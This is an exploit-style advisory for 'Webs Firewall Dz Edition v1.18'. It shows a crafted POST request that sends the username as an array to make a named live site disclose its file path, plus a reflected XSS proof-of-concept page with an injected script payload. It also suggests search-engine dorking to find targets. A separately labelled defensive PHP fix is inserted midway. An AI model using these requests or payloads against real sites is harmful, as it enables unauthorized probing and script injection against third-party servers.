====================================================================================================================================
| # Title : Webs Firewall Dz Edition v1.18 Multi vulnerability |
| # Telegram : @indoushka |
| # Tested on : Windows 10 French V.(Pro) |
| # Version : 1.18 |
| # Vendor : http://www.ithrytec.com/ |
====================================================================================================================================
poc :
[+] Dorking in Google or other search engine
Application error message :
Request
POST /webs/index HTTP/1.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Referer: http://imaa-univ.com/webs/
Cookie: PHPSESSID=42b374f6e8a331cad18647dd127167b0
Host: imaa-univ.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

signin=&password=g00dPa%24%24w0rD&username[]=nxseqxea
Response
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 06 Mar 2018 17:49:59 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Original-Content-Encoding: gzip
Content-Length: 2661
Vulnerability description :
This page contains an error/warning message that may disclose sensitive information.
The message can also contain the location of the file that produced the unhandled exception.
This may be a false positive if the error message is found in documentation pages.
This vulnerability affects /webs/index.
Attack details :
URL encoded POST input username was sent as an array (username[]) with the value nxseqxea
Error message found :
<b>Warning</b>: mysqli_real_escape_string() expects parameter 2 to be string, array given in <b>/home/imaauniv/public_html/webs/index.php</b> on line <b>106</b><br />
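Added example (not part of the original advisory and not the vendor's code): a sketch of how a login handler can reject the array-typed username before it reaches any mysqli call, and keep PHP warnings out of the response. The function names scalar_field and handle_signin, the users table and the password_hash column are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Never render PHP warnings to the client; log them server-side instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Return the field only if it is a non-empty string within a length limit.
// PHP turns "username[]=x" into an array, the type that reached
// mysqli_real_escape_string() in the warning above; reject it here.
function scalar_field(array $input, string $name, int $maxLen = 255): ?string
{
    $value = $input[$name] ?? null;
    if (!is_string($value) || $value === '' || strlen($value) > $maxLen) {
        return null;
    }
    return $value;
}

// Hypothetical handler: returns [HTTP status, generic message].
function handle_signin(array $post, ?mysqli $db = null): array
{
    $username = scalar_field($post, 'username');
    $password = scalar_field($post, 'password');
    if ($username === null || $password === null) {
        return [400, 'Invalid request']; // no file path or PHP detail leaks
    }
    if ($db === null) {
        return [200, 'Input accepted']; // demo path, no database attached
    }
    // Bound parameters replace manual escaping (table and column assumed).
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($hash);
    $ok = $stmt->fetch() && password_verify($password, (string) $hash);
    $stmt->close();
    return $ok ? [200, 'Signed in'] : [401, 'Invalid credentials'];
}

// Constructed bodies; parse_str() builds arrays the same way $_POST does.
parse_str('signin=&password=g00dPa%24%24w0rD&username[]=nxseqxea', $arrayBody);
parse_str('signin=&password=g00dPa%24%24w0rD&username=nxseqxea', $stringBody);
foreach ([$arrayBody, $stringBody] as $body) {
    [$status, $message] = handle_signin($body);
    echo $status, ' ', $message, PHP_EOL;
}
```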
XSS Reflected - jQuery JavaScript Library v2.2.4 :
<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - jQuery JavaScript Library v2.2.4 </title>
<script src="http://imaa-univ.com/webs/assets/js/jquery-2.2.4.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script><marquee><font color=lime size=32>indoushka</font></marquee>;</script>;</script></option>
</select>
</p>
</form>
</body>
</html>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | |
|
=======================================================================================================================================